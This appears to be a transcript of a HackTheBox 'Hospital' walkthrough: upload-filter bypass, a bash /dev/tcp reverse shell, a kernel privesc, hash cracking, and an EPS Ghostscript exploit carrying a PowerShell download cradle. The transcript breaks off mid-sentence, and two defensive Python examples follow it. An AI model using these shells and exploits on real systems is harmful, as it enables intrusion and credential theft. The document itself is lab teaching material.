What's going on YouTube, this is IppSec, and I'm doing Hospital from HackTheBox, which starts out with hacking a file upload form. You can use this to get code execution; there's a few tricks, but once you do, you're on a Linux container, and if you look at the kernel it is a little bit out of date, from like February 2023, so it's over a year old. There are a few intended 2023 CVEs that you can use to privesc, but I'm going to end up showing a very recent one, I think it came out like a month ago, the netfilter one in 2024, because it's just more relevant today. We'll use that to privesc, we get root on the container, we can crack some hashes that enable us to log into a doctor's email, discover someone's using Ghostscript with EPS files to do some conversion, there is a vulnerability there, so you can email them a malicious EPS document, gain a shell on the Windows box, and from there there's two different privescs. The more interesting one is uploading a keylogger and then just logging the keys and discovering they type a password in.

So with that being said, let's just jump in. As always we're going to start off with an nmap, so -sC for default scripts, -sV enumerate versions, -oA output all formats, put it in the nmap directory and call it hospital, then the IP address of 10.10.11.241. This can take some time to run so I've already run it. Looking at the results we have quite a few ports open. The first thing we see is SSH on port 22 and its banner tells us it's an Ubuntu server. Then the next thing we see is DNS on port 53 and its banner says it's Simple DNS Plus, and then we have a bunch of Windows things related to Active Directory. So is this going to be an Ubuntu machine or a Windows machine? At this point I don't really know; I guess the HackTheBox platform does tell me this is Windows, but I don't know which IP is holding 10.10.11.241. So right away I'm just going to go ahead and add the hostnames to my hosts file before I forget the step, and then we're going to do a little bit of network analysis to find out
which host is 10.10.11.241, because it looks like there's two. So hospital.htb I got off of the LDAP certificate, and we also have dc.hospital.htb, so let's go ahead and add this. And then real quick, while we're in nmap, might as well look through all the ports. So we know we got an SSH server, we have Active Directory, there's nothing on port 80 but 443 does have Apache, and it's telling us it is running on Win64 and it has PHP enabled. Most likely this is a program called XAMPP, that's the most common way to get like Apache and PHP running on Windows. Then we have SMB on 445, looks like a lot of LDAP stuff there, 3389 so we got Remote Desktop open to us, and then 8080 has a second web server, and this one is Apache again but it's running Ubuntu. So we have quite a few ports that have both Ubuntu and Windows.

The easiest way to look at this is just going through the TTL, that is the time to live. We can just ping 10.10.11.241 and we see the TTL of that is 127. That immediately tells us the host of this computer is Windows, because Windows defaults to 128 as the TTL and it decrements one every time it hits a router. There's the VPN server between me and this Windows box, so that's why it decremented to 127. However, we can go one step further and just look at the TTL on a network connection. Normally I use Wireshark in my videos to show this, but since we've shown it before let's just do tcpdump. So we're going to do tcpdump on my tun0 interface, so that's the VPN interface. You need to add -v for verbose to show the TTL; by default the TTL is not shown unless you do that. Whenever doing tcpdump I like -n to hide DNS, and then to get rid of some fluff I'm going to say ip src is equal to 10.10.11.241, because we only want to see packets where the source address is coming from this guy. If we didn't have this we would see connections of me going to the server and the server coming back to me. So let's run this tcpdump command, and then we just need to make
a connection to a port. So I'm just going to use netcat; you could use curl, you can use anything you want. So we'll do netcat 10.10.11.241 and then we can say port 22, and we see the TTL is 62. Linux by default sets it at 64 and it's got two hops: it's got a hop through the Windows box, which is acting as a router, it's probably running Hyper-V, and then it has to hop through the VPN router, so it's two hops to me. And what this is telling me is Hyper-V is in play; if it was Docker, Docker doesn't decrement the TTL. I don't think the Windows Subsystem for Linux decrements the TTL as well, maybe it does, I'm not positive, but this is what network forensics can kind of tell you. If we go to like 443, that was the Windows port, you see the TTL is 127. So now we know the external facing thing, the main host, is going to be a Windows box. Doesn't help us all that much, but any type of recon we can get early on definitely is beneficial.

So let's just go take a look at HTTPS and we'll see what this web server is. We just want to accept the risk, and this is loading a Roundcube instance, and we don't know any username or password, so this doesn't really help us too much. We could potentially try to find the version; I think there is a way you can figure out the Roundcube version, not positive. If we just do GitHub roundcube, maybe it's like README.md or something, let's see, README.md, does this exist? Forbidden. So there probably is a way to enumerate the Roundcube version, but it's not that beneficial. Let's go take a look at what's on port 8080, we don't want to do HTTPS I don't think, and we just get a login page. We could test like credentials; if we do admin / password to see if this works, we get invalid username and password. I was hoping it would tell us if the username existed or not. Let's try making one: let's create the username admin and do password, and we see username's already taken. So we know the username admin exists on this website, there is a way to enumerate valid users. Let's now just create the
username ipsec and then log in. So if we do ipsec / password we get logged in, and it looks like just a simple file upload, and I notice this is running PHP, so let's try uploading a PHP file. Or, it's telling us what type of file it wants us to upload first: image files. So let's grab an image file and then just see what a legit upload looks like. So let's do locate png, I'm just going to grab a random PNG here, copy it, and then we can go to browse, let's go htb/hospital, and then upload this. And I'm going to want to tell my Burp Suite I want to intercept this request and then forward it along. So let's forward this request, and we saw it redirecting us to success.php. We don't see where the upload is stored; if we try like guessing a directory, maybe it's in uploads, that's a common place, we get a forbidden, so we know this probably exists. If I do a directory that doesn't, we get a not found. So we know uploads does exist, now we just have to guess at the file name. The first thing you always do is just guess at the name you uploaded, so like buttons.png is what we uploaded, so if we try this we do get the image we uploaded. If this didn't exist I'd try like the md5sum.png, just the md5sum, I try just things that developers do to rename files, but since we know we can just upload a straight file, let's go over to the Repeater tab where we sent that request to. I'm going to change the .png to be .php and we get a /fail.php, and if I try buttons.php we get a not found, so we can't upload that. If I did like .php3, .php5, these are all going to /fail; if I do like .php99 we get success. So we know this filter is a blacklist, because an unknown extension works. Something else you could do is you could send this over to ffuf and then guess that way. Let's try that because that's always a fun exercise. I'm going to copy to file and I'm going to make this upload.
request. We can save it and then let's just make sure it looks like we want. That looks fun, I saw a bunch of gibberish but that's just the image, but this looks like a normal upload. So let's edit this; we're going to change the extension right here, we're going to put FUZZ, and then we can do ffuf -request upload.request -request-proto http; by default it's going to do HTTPS so you want to just say http. And then we do the wordlist, so we'll do /opt, and I'm going to use, let's see, /opt/SecLists, Fuzzing, and then there's extensions. So let's do /opt/SecLists/Fuzzing and then extensions, extension*, and I just want to get a small wordlist to start. Let's see, for i in ..., do cat $i | wc -l, permission denied, we want to do ls. There we go, we also need to say echo -n $i. There's probably a better way to do this; I bet if I did wc -l extens*, like that, we got to go in that directory, I bet this would also do what I just did. Eventually I got there. So that's probably too many, this seems like a good number I'd want to do, so I'm just going to copy that. Let's look at that file real quick, that looks fine, let's do php4, oh php4 is not there, that's not what I want. Does this one have php4? That's just like a common extension I want. This one has percent something, that's like format strings. Let's just do most common. So picking the wordlist is always something that takes a little bit of time; this looks good, so let's do extensions-most-common, FUZZ, and then we send the request off. We can see every request right now looks the same; we want to be able to match for when it contains success, but I don't think the match regular expression in ffuf actually looks at the headers. So if I do success, let's see, it is all lowercase, oh it does look at headers I think. So we can see all these extensions worked, so we could do pdf, cfm, cfg, docx, doc, our phtm, maybe like phtm will get code execution, so we can try that. So let's erase all of the binary data and then we can do <?php
system('whoami'); like that, and we want to make this file .phtm. Curl it, it got the redirect, so if we go to this .phtm we just get the file, so that did not convert it to PHP. One extension that I don't think is in that wordlist, we can look for it, let's see, we did it down here, let's go back to this, we can grep for phar, and that doesn't look like it's in any of those, but phar is another good PHP extension, so let's try doing that one. I'm sure if you did a blog post on just ways to like valid PHP extensions, this is one of the more common ones; it's just one of the newer ones. And now let's go back to this page, we need to change the extension to .phar. buttons.phar does not exist, it said upload success, that is bizarre. Okay, but let's do test.phar. Something is behaving really weird, so we get the file, we do view source, oh I'm in view source, so I don't know why buttons wasn't working, but test is kind of, we don't see any output here, and that is like really really odd. Let's just do this in curl, or actually we can do it in Burp Suite, let's just do intercept this request, intercept, send. We just have a blank response; if we do hex, I think it sends nothing, maybe it sends 89, I don't know exactly what 89 translates to. I want to try buttons real quick, so buttons is working here, it must be like a web browser caching thing, where maybe I erased the N, maybe that's what was happening. But we're now using test.phar, we have no output, and what this tells me is there's something blocking our PHP code, because I should either see the shell I uploaded, like this string, or I should see the output of whoami. Since I see neither of those, I know it executed my PHP and decided to do nothing. We could change this over to an echo command, and if we do that we see now it echoes the thing; it doesn't say like echo space whoami, so we have code execution. So what we want to do here is do a phpinfo, so if we do phpinfo() and then let's just go back to test.
phar. We can turn intercept off as well. We will have the phpinfo page, and the thing I'm looking for is disable_functions, and we can see they have disabled a lot of functions here, like shell_exec, system. So we can't use system, we can't use shell_exec, we can't use just exec, so this is why the system command failed. We could probably just like manually read files, but we could look for any function that's dangerous that isn't disabled. And if we use like p0wny-shell, I think this is it, I'm not actually going to use this, I'll just talk about it real quick: this is a good single-file PHP shell that automatically does a lot of the bypassing for you, but I want to show it. If we go to shell.php we can see before it tries to execute a command it's looking if these functions exist, we got system, ob_start, ob_get_contents, and if those exist it's going to build a gadget to use these functions to execute. If we look at what function_exists does, it's up here, all it's going to do is say if function_exists, so that's all this is doing, it's automating the way to do these types of ways to get code execution. But if we went to ippsec.rocks, I want to say like PHP disable, I used a thing called dfunc-bypass in this UpDown video. We're going to redo everything we did in that video, so if anything doesn't make sense go back to that one. I think I have to do dfunc bypass GitHub, this will bring up the page I want, and the downside with this is it's going to be in Python 2, and I hate using Python 2, so we're just going to convert it to use PHP, which again I did in that previous video, it doesn't take much time. The way they intend this script to be run is you grab all the disabled functions from phpinfo, copy and paste it into this Python, and then work it that way. What I'm going to do is just do it all in PHP, so I'm going to grab all their dangerous functions; if we like Google any of these we'll find a way to execute code. So let's do vi dangerous.
php, and I'm going to say $dangerous_functions is equal to array(...), like that, and then let's make this PHP, okay. And then we want to just do a loop, so is it foreach dangerous... I forget exactly how to do a PHP foreach loop, this is embarrassing. I think it's like foreach dangerous function in something, let's see, foreach blank as value, okay, so $dangerous_functions as $f, there we go. And then we just want to say if, was it function_exists, and then $f, then we can say echo, let's see, we want to say $f, then period is a concatenation, ' exists', and then let's do a line break. Enter. I don't think I need the parentheses there, it's been so long since I've done anything in PHP. Let's try this; I probably should have closed that PHP tag, but oh well, it does not matter. So we're going to put this, okay, then I'm just going to execute this. Internal server error, so we screwed something up, let's see, dangerous functions array, I see it, we need another parenthesis there, I can just manually fix that, let's go here, okay, there we go. So we have a few: we have dl, popen, link, symlink, syslog and mail. popen's probably the easiest one to exploit; if we just do PHP popen run command we'll probably go to like their help page that tells us how to do it, let's see, popen manual, and let's see, we want to be able to read the output, so let's grab this, paste this in, okay. Hold on one second, I'm going to put this in and get rid of this parenthesis, and we're going to rerun it. Okay, I was wondering if this error_reporting line would magically just put the error message in that HTTP response, because that would come in handy when you're just troubleshooting things, but I think Apache's not in developer mode or whatever it is, it's in production mode, so it strips all 500s. So here we have the script, we got a popen path to executable, so let's just do /bin/ls, and I always like doing full paths. Let's try without a full path real quick; when we do a popen, oh it still works, we see our two items, so we don't need the
full path there. So we can now navigate the file system. So what I want to do is get a reverse shell, so we can do a bash -c "bash -i >& /dev/tcp/10.10.14.8/9001 0>&1", like that, okay, close off the double quote, that looks good, send it. Let's listen on 9001 and then I'm going to go over to this tab, run it, we're hung here, that's a good sign because we have a shell. And then whenever I get a shell I always like making sure I don't hang the server completely, so I'm just going to try getting it again. So if I cancel this request, send it again, we got it, okay. So every now and then when you get a shell it may hang the whole web server, so I always just like testing for that, because you don't want to create an outage that you don't know about. So let's upgrade this shell to be a proper PTY: python3 -c 'import pty; pty.spawn("/bin/bash")', close the parenthesis like that, stty raw -echo; fg, enter, enter, export TERM=xterm. Awesome, so now we have a shell on the web server as www-data.

The first thing I always like doing is looking for a database, let's see, we have uploads, login, where's like settings.php, I guess we could cat login.php, and oh God I hate when they like intermingle HTML and PHP. Let's see, session_start, config.php, how did I miss that, it's the first one. So we have root and a MySQL service, so let's do mysql -u root -p, okay, show tables, show databases, use hospital, show tables, select * from users. So we have two hashes right here, so we could grab them, so vi hashes, I'm going to call this hashes.8080, I guess we could call it like patient upload or something like that; I always like putting the username as well, and let's see, we can grab this patient, okay. So let's cat this, put it on the clipboard, and then I'm going to attempt to crack these. So we can go to the Kraken, go hashes, or hashcat/hashes, I'm going to call this hospital-8080. ./hashcat.
bin hashes/hospital-8080, wordlist, we don't do -o, wordlists/rockyou, and this is probably going to fail, autodetection mode maybe. Oh, we have to do --user, let's see, and the mode is this, we're not using forms, e-commerce, it's just going to be standard bcrypt, so -m 3200. So now the cracking is going in the background, and I don't think that's actually going to crack, but I do want to just show those steps; every now and then we want to see what else we could do on the server.

If we look at the uname output we can see this kernel is from February 3rd 2023, and I think maybe the intended is like GameOverlay or another like old privesc, but I'm going to do an unintended privesc, just because it's another old kernel; I don't see the purpose of showing you a kernel privesc that's over a year out of date, I'd rather show you one that's like a month out of date. So let's go over to our web browser and look for one. I wonder if I just do uname -a again real quick, would it just come up if I googled this kernel, let's see, kernel exploit this, let's make sure Burp Suite is indeed off, I don't know if it will. Let's see, this is the one I think that's intended, this inactive one, which I think is GameOverlay, but I don't think this is coming up. So let's see, I'm going to try Linux kernel privesc, and I know there's going to be a super generic result, but if we do Tools, any time, past month, and let's go to the top result, and let's see, I want to say this is good between version 5.14 and 6.6, that is a lot of versions, and we're 5.19, so chances are this is going to work just because we're between those two versions. So I'm going to download this, and you should always compile it yourself, but we're in a lab environment so we don't have to. We cracked both of them, so admin's password was 123456 and patient is patient. But let's do make, /www, wget, that's not what I want, let's copy, wget this, okay, python3 -m http.server, then we can /dev/shm, wget 10.10.14.8:8000/
exploit. There's really no harm, even if this exploit was malicious, of it really affecting anything, because I'm running it on a temporary computer. So I just want to see if the privesc works and if it's stable, so let's run it, and immediately we get over to root. So this is a valid privesc, this is like the nftables privesc, so if you want to go back, this is a good CVE for it, it affects a lot of kernels. Let's see, so from here what can we do as root? Well now we can read the shadow file, and let's just do cat /etc/shadow, grep everything that has a dollar in it, and there's two: we have root, which is this weird encryption, $y$, and then drwilliams, which is something we're used to seeing. I'm going to start this crack off, and then we're going to talk about the other one; I don't think the other one's actually supported in hashcat yet, maybe it is in the newest version if we updated. Let's do vi hashes/hospital.shadow, paste this, go back to hashcat, I probably should have done the user, but oh well, okay, so that's cracking.

So this whole $y$, this is actually yescrypt, and we see it's already cracked, so we'll go back to that cracking in a minute. But when I want to look at what encryption things are relevant, we can always use the man pages; you could go to Google, but Google actually took me longer to find than just using the man pages. Maybe ChatGPT would help me as well, but knowing how to use man pages is very important. If we look at this we can see the description in the crypt page, crypt is just how Linux does encryption, and it says hashing methods described in crypt(5). Now a lot of people may just be confused by this, but we can just do man 5 crypt and then it talks about that. So what is that? That is a page of crypt, or a man page. If we look, by default we're on page three here, and what are those pages? Let's just do a man of man and it tells you what each page is: one is for executable programs, five
is for file formats and conventions, so that's why all the hashing conventions would be in page five of crypt. Library calls, which crypt is a library, essentially a DLL if you come from Windows, so that's why we default to page three. Syscalls would be on page two. So this is just how the man page is organized. So let's go to man 5 crypt and then we can see how things are set up, and available hashing methods, and then we have yescrypt, prefix $y$, here's the format, it's passphrase, details about it. Then you got the gost-yescrypt, if it's a $gy$, it talks about all of them: scrypt is $7$, bcrypt is $2$ then b or x or a or y can be those things. So this is a great way just to familiarize yourself with exactly how hashing works, because it tells you what everything is. sha512crypt, the next thing after the $6$ is going to be the rounds. So just a good resource in general.

But let's look at what hashcat has told us: it said the password for drwilliams, I think that's what it was in the shadow file, is qwe, bang, pound, so drwilliams is right there. So this was a Windows box, so let's try, we can get out of hashcat now, netexec and then smb 10.10.11.241, and then we want to do -u drwilliams -p and copy, the line break, there we go, let's put this in quotes and send it on off, and we'll see it does authenticate. So whenever I see that I always like just making an invalid password, because I like seeing an authenticate and a de-authenticate, because sometimes Windows will tell you everything's valid. So we know that is the valid password. We can do --shares and see if there's any unique shares that drwilliams has access to; it does not look like it. If we do drwilliams, let's try like winrm, see if that exists, we don't want to do shares with winrm, no. Is RDP a thing? I want to say it isn't. netexec, netexec -h, ftp, ldap, rdp, it is. It didn't give me any output, I don't exactly like that. Let's try xfreerdp /v:10.10.
11.241 /u:drwilliams /p, I'll put the password on standard input because I'm not positive how that works, yes, password, and we have a connection failed. So what's next? Well, remember there was a Roundcube instance on HTTPS, so let's go back there, we're on 8080, drwilliams, put in the password, log in, and clean up some of these tabs. And we get logged into drwilliams' mail, and the inbox does have one message: Needle designs for Darius Simeon. And let's see, project later can take, he wants an EPS file so it can be visualized with Ghostscript. So I'm going to Google EPS Ghostscript exploit to see if there's any way I can send him a malicious attachment, and right off the bat we have one. So if we look at this we have a CVE to create a malicious EPS file, so I'm going to clone this repository, okay, and then let's see how does he use it. It looks like there's a generate, reverse shell, IP, this looks like exactly what I want, so if I run this, let's change the reverse shell information, 9001, 10.10.14.8, okay, so it generated this EPS file. So I always want to look at exactly how it works, to understand the exploit; it looks like something after stroke, maybe I'd have to look in the CVE, but this is the payload it's using, and right away I can see this is not going to work on Windows. This reverse shell payload is only a Unix thing; I don't see any like win reverse shell payload. I'm going to do a grep -r on rev shell and let's see, I only see Unix here, I was hoping to see a win_. So we have to figure out a way to get a Windows reverse shell on this. So let's see, I'm going to create actually a new window just to stay organized a bit better, we can go in here, we want to create a one-liner that does code execution, so I'm going to do cp /usr/share/nishang/Shells/Invoke-PowerShellTcpOneLine.ps1, I'm going to call it shell.
ps1. So I have to type that name again, and I don't have to do it this way, but I always like having a web server, like a web cradle, execute it, because if I just encoded this and sent it to the server and antivirus picked it up, I wouldn't know if my code execution worked. So if I do a web cradle, so the server reaches back to me to download the payload, antivirus is not going to trigger that often when making an HTTP request, so that validates I have code execution, and if I don't get the shell then I know AV probably blocked the shell, or I made a typo or something like that. So that's why I like making this a two-step process instead of just doing a one-step; we can show it will probably work both ways, but I just want to kind of explain my logic as I go. So we have the shell there, our web server is in this one, let's just close that out so we can listen here. So now what we need to do is create a one-liner to execute that, so I'm going to do echo, then IEX (New-Object Net.WebClient).DownloadString, I always like doing the DownloadString in single quotes, so 'http://10.10.14.8:8000/shell.ps1', like this, awesome. And now to avoid any like quoting issues, because we got that double quote there, the single quote, I always like just base64 encoding it, and Windows likes things in UTF-16 little endian, so we're going to do iconv -t, for target, utf-16le, and all that does, if we pipe it over to xxd, we can see every character, it just puts a null byte afterwards, because it's 16-bit encoding. If we remove that whole iconv command you can see it doesn't have that, but that's how PowerShell likes its base64 and everything else. So let's do a base64 -w0, so now we have our web cradle command, so this is going to execute whatever's on the web server. So let's go back to this CVE, so python3 CVE, was it generate, then we can do payload, I'm going to do powershell -enc, paste in that, and then we need file name shell.
eps. We'll do shell and then extension eps, there we go, so now we have a shell.eps. Let's move that up one directory to stay a little organized, look at it, that is definitely our PowerShell command. Let's listen on 9001 and then go back over to Roundcube, we can reply to him, wait for Roundcube to get the message, intercept is off, it's just taking its time. Attach a file, shell.eps, "here is the design spec you want", and it's going to drbrown, send it, waiting for it to send, it's sent. So now what we want to do is wait for an HTTP request to come in and see if we get the reverse shell, and waiting, it'll probably take like 60 seconds, oh no, we got it. Almost looks like the shell came before I saw that HTTP connection, but there we have it, as drbrown. So again, because it made this request we know it got there, and then obviously we got the shell, but if we didn't want to stand up that web server we didn't have to. Let's just show that real quick, was I in www, I was, so cat shell.ps1 | iconv -t utf-16le | base64 -w0, let's just make sure this works so I'm not lying to you when I say things. I should just do like xclip to copy this, but oh well, copy that, run this again, I think I do Ctrl-D, no, I always forget the hotkey to delete a whole word, I thought I had it memorized but apparently not. So we have a lot more base64, paste, file name shell2, oh we got to go in that directory, there we go, let's move shell2 up one directory, nc -lvnp 9001, and we will send that message again. I'm just going to make that full screen, waiting, and before I send it, I realize I always like using rlwrap when I do a Windows shell, so we'll attach it, we don't need to send a message I don't think, let's just clear that. Can exit that, because that gives me the up and down arrows when I'm in my Windows shell, so it's a big quality of life thing. So we can send that one there, and if we look we have nothing on 8000 anymore, so there's no way for it to hit our web server, we should just
magically see the shell come in, as long as this worked I guess, and there it is. So again you don't have to do the web cradle, but it is good practice anyways. Now we are drbrown; if we do a dir in his directory we see there is a file called ghostscript. If I look at what ghostscript is, we can see it's running PowerShell, and it looks like this may be drbrown's password right here, is Chris Brown. Looking at it, it's running the Ghostscript exe against every file in his Downloads, so this is just automating executing that EPS file. Nothing too interesting here, other than you could get Chris Brown's password if you wanted. We could verify that is indeed his password with netexec, so netexec smb 10.10.11.241 -u, what was the name, drbrown, -p, and then after this we can check winrm as well to see if he's a member of Remote Management Users. So running this, it looks like we could use evil-winrm if we wanted to establish a shell again as this user; we already have PowerShell so we don't have to do that, but it is an option if we wanted to.

So let's think about this; there's two ways we can really get to root from here. The first one's the unintended, that's going to be what I'm going to show first, because it's just so much quicker. If we went back to our nmap, so if we go nmap/hospital, look at 443, we knew Apache was listening on Windows as well. The Apache instance we had exploited initially was the one on port 8080, which is on Ubuntu, so we know the Windows server did have a web server. And I always like, whenever I land on a box, especially Windows, to get code execution also as the web user, because there may be like a SeImpersonate privilege that you can use, one of the potatoes, to get admin. So let's go do a dir here, and we go in xampp, because this is normally how Apache is installed on Windows; htdocs is normally the like /var/www/html, and here we can see PHP files, install, I bet install was the file I was thinking of. What if we just did
install on HTTPS, is that blocked? After 241/, forbidden. So .htaccess is blocking access to this, but this is Roundcube. If we put a shell here, so let's just try echo '<?php system(whoami)', like that, we probably want a, let's see, close the PHP tag, semicolon, and call it shell.php. So if I now go over to shell.php, do you think it's going to execute? We did not, it didn't execute anything at all, and there's something at play that we kind of talked about earlier in this video. If we look at shell.php, wait, what, there we go, it just took a while for that type command to work, but it looks fine. Let's go over to curl, or better yet let's do Burp Suite, so let's do proxy, intercept, yeah let's do intercept on, send this, go over to the Repeater tab, run this. This looks fine, but what if we go over to hex, what are we seeing? We're seeing it's UTF-16 little endian encoded, because that's what PowerShell likes; we can see this is the P, this is H, and this is actually breaking the magic byte check for, where is it, not there, not there, right here: when it's looking for the <? it's actually failing because it's not UTF-8. The charset here says UTF-8 in the response, but it's UTF-16 little endian. So to fix that we want to do a, what was it, Out-Encoding, no, Out-File I think, we do Out-File -Encoding and we can say utf8, and then the file name shell.
PHP I think that's what we did let's go back here run it that looks better I see Authority right so it's no longer UTF 16 little endian encoded so we have a shell and wow we're system as the shell so all we have to do here is um change this up so we have code execution so we can say request CMD like that and then we can change this to be a post request CMD equals to Mii uh still not working PHP system request that should have worked type string an array was given what did I screw something up PHP system that is bizarre I'm really not sure what's happening here oh Let's Escape this um my file was system and then CMD it escaped this request because it thought this was a variable at least I think that's what just happened um let's replace these quotes let's do single quote here double quotes here single quote there there we go that should fix it there we go that was a weird issue so now we have a shell so let's see do I have uh let's if I do a new thing um generate is this it let's just go cve oh was dub dub dub we can say this copy I can say command Powershell encoded this string and that does not look like it worked. 
exe encoded command see where is this erroring to we have that wonder if I have to do like that no hop thing and stuff see what begins with no no profile that's not just it non- interactive is my command getting terminated don't think so what if my argument just too long what's that plus that was it so I had a plus right here in this encoded command so I forgot to URL en code this and that's what was causing the issue right if I do control shift U you can see a plus there there's probably a few other pluses but that's what was breaking my base 64 it was getting translated to a space right so always make sure you yourl in code but now on this one we do who am I we are system so of course we can go users administrator desktop and we get the flag if we wanted to so that's the uned way um the intended way is much cooler so if we looked at this box if we do like task list think that's going to work right is our rep just making this take a while um maybe get process will work so looking over to these results we see something that sticks out right away we have some process with one which indicates it's an interactive login um these are probably VMware ones SV host but let's see we have inter explorer was that I saw shell experience Powershell search UI elas here we go Internet Explorer so we see someone is logged into this box um h m server this is zero so that's the non- interactive that's just running as a service um one is Explorer as well if we did qw insta we can see Dr Brown is physically logged in the state is set to active um where ID zero um if we do let's see who am I we are Dr Brown so we're still Dr Brown we're just in a non-interactive to the desktop session um if we also did was it query user I think that shows logged in users too but we want to become process one right or ID one we shouldn't say pit process one because that's something completely different we want to become an interactive one and and if we do then we can run a key logger and see what Dr 
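A check that follows from the encoding problem above, written as an added example for this transcript rather than anything from the video or the Hospital box: Windows PowerShell's default Out-File writes UTF-16LE with a byte-order mark, so a file whose source text starts with "<?php" carries the bytes FF FE 3C 00 3F 00 ... and a byte-level search for "<?php" (the kind of magic-byte check described above) never matches. The script below is a defender-side scan of a web root that decodes each file under several encodings before looking for a PHP open tag, so a UTF-16 file is flagged rather than missed. The directory and the three sample files it builds are constructed for the demonstration; the encoding list, the tag list and the function names are choices of this example.

```python
"""Encoding-aware scan for PHP open tags in a web root.

Added example (not from the video or the Hospital box): a defender-side check
that flags files whose PHP open tag only becomes visible once the file is
decoded as UTF-16, which is what a file written by Windows PowerShell's
default Out-File (UTF-16LE with a BOM) looks like. A naive byte search for
b"<?php" misses such a file.
"""
import codecs
import os
import tempfile
from typing import Optional, Tuple, List

# Decodings to try, in order. "utf-8-sig" handles plain UTF-8 with or without
# a BOM; "utf-16" honours a UTF-16 BOM; the explicit LE/BE variants catch
# BOM-less UTF-16; "latin-1" never fails, so it is the catch-all last resort.
ENCODINGS = ("utf-8-sig", "utf-16", "utf-16-le", "utf-16-be", "latin-1")

# PHP open tags we consider a hit (assumption of this example: only these two).
PHP_TAGS = ("<?php", "<?=")


def naive_has_php_tag(data: bytes) -> bool:
    """The byte-level magic check that a UTF-16 encoded file slips past."""
    return any(tag.encode("ascii") in data for tag in PHP_TAGS)


def find_php_tag(data: bytes) -> Optional[Tuple[str, str]]:
    """Return (encoding, tag) for the first decoding under which a PHP open
    tag appears, or None if no decoding exposes one."""
    for enc in ENCODINGS:
        try:
            text = data.decode(enc)
        except UnicodeDecodeError:
            # Wrong encoding for this file (e.g. 0xFF in UTF-8, odd length
            # for UTF-16): try the next one.
            continue
        for tag in PHP_TAGS:
            if tag in text:
                return enc, tag
    return None


def scan_web_root(root: str) -> List[Tuple[str, str, str, bool]]:
    """Walk `root` and report every file in which some decoding reveals a PHP
    open tag. Each hit is (relative path, encoding, tag, missed_by_naive)."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in sorted(filenames):
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            found = find_php_tag(data)
            if found:
                enc, tag = found
                rel = os.path.relpath(path, root)
                hits.append((rel, enc, tag, not naive_has_php_tag(data)))
    return hits


def build_sample_root() -> str:
    """Create a throwaway web root with three constructed sample files (not
    files from the box) so the scan can run offline."""
    root = tempfile.mkdtemp(prefix="htdocs_")
    samples = {
        # Ordinary UTF-8 PHP file: caught by any check.
        "index.php": "<?php echo 'hello'; ?>".encode("utf-8"),
        # Same content as Windows PowerShell's default Out-File would write
        # it: UTF-16LE with a byte-order mark. A byte search for "<?php"
        # does not match because every character is followed by a NUL.
        "shell.php": codecs.BOM_UTF16_LE
        + "<?php echo 'hello'; ?>".encode("utf-16-le"),
        # Benign file with no PHP tag under any decoding.
        "notes.html": b"<html><body>no php here</body></html>",
    }
    for name, data in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    sample_root = build_sample_root()
    for rel, enc, tag, missed in scan_web_root(sample_root):
        note = " (missed by byte-level search)" if missed else ""
        print(f"{rel}: tag {tag!r} visible when decoded as {enc}{note}")
```

Run stand-alone it lists index.php as a normal UTF-8 hit and shell.php as a hit that the byte-level search would have missed; notes.html is not reported. On a real web root the same scan_web_root call, pointed at htdocs, is the useful part.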
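The "+" problem mentioned above, as an added example and not code from the video: base64 output uses "+", "/" and "=", and form/URL decoding turns a literal "+" into a space, so a base64 value pasted straight into a query string no longer decodes on the receiving side. The Python below reproduces that with a constructed four-byte sample whose base64 contains all three characters, then shows the two usual fixes: percent-encoding the value, or using the base64url alphabet together with a matching decoder. The parameter name, the sample bytes and the function names are assumptions of this example.

```python
"""Why base64 in a query string must be percent-encoded.

Added example (not from the video): a server-side parameter decoder that
behaves like a typical web framework (parse_qs), plus three ways of building
the query string, only two of which survive the round trip.
"""
import base64
import binascii
from typing import Optional
from urllib.parse import parse_qs, urlencode

# Constructed sample: its standard base64 is "+//7/w==", so it contains every
# character that form decoding or URL parsing can mangle ("+", "/", "=").
SAMPLE = b"\xfb\xff\xfb\xff"


def raw_query(data: bytes) -> str:
    """Paste the base64 text into the query string with no escaping at all."""
    return "data=" + base64.b64encode(data).decode("ascii")


def encoded_query(data: bytes) -> str:
    """Percent-encode the value ("+" -> "%2B", "/" -> "%2F", "=" -> "%3D")."""
    return urlencode({"data": base64.b64encode(data).decode("ascii")})


def urlsafe_query(data: bytes) -> str:
    """Use the base64url alphabet ("-" and "_") instead; nothing needs
    escaping, but the receiver must decode with the urlsafe variant."""
    return "data=" + base64.urlsafe_b64encode(data).decode("ascii")


def _first_value(query: str, name: str) -> Optional[str]:
    """Parse the query string the way a web framework would: "+" becomes a
    space and %XX sequences are decoded."""
    values = parse_qs(query, keep_blank_values=True).get(name)
    return values[0] if values else None


def decode_param(query: str, name: str = "data") -> Optional[bytes]:
    """Standard-alphabet decode with strict validation, so a space (from an
    unescaped "+") makes the value invalid instead of being silently dropped."""
    value = _first_value(query, name)
    if value is None:
        return None
    try:
        return base64.b64decode(value, validate=True)
    except binascii.Error:
        return None


def decode_param_urlsafe(query: str, name: str = "data") -> Optional[bytes]:
    """Decoder matching urlsafe_query(); accepts "-" and "_"."""
    value = _first_value(query, name)
    if value is None:
        return None
    try:
        return base64.urlsafe_b64decode(value)
    except binascii.Error:
        return None


if __name__ == "__main__":
    for label, q in (("raw", raw_query(SAMPLE)),
                     ("percent-encoded", encoded_query(SAMPLE)),
                     ("base64url", urlsafe_query(SAMPLE))):
        print(f"{label:16} {q:28} standard decode -> {decode_param(q)!r}"
              f"  urlsafe decode -> {decode_param_urlsafe(q)!r}")
```

The raw form fails because parse_qs hands the decoder " //7/w==" (leading space) rather than "+//7/w=="; the percent-encoded form round-trips with the standard decoder; the base64url form round-trips only with the matching urlsafe decoder, which is why sender and receiver have to agree on one of the two.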
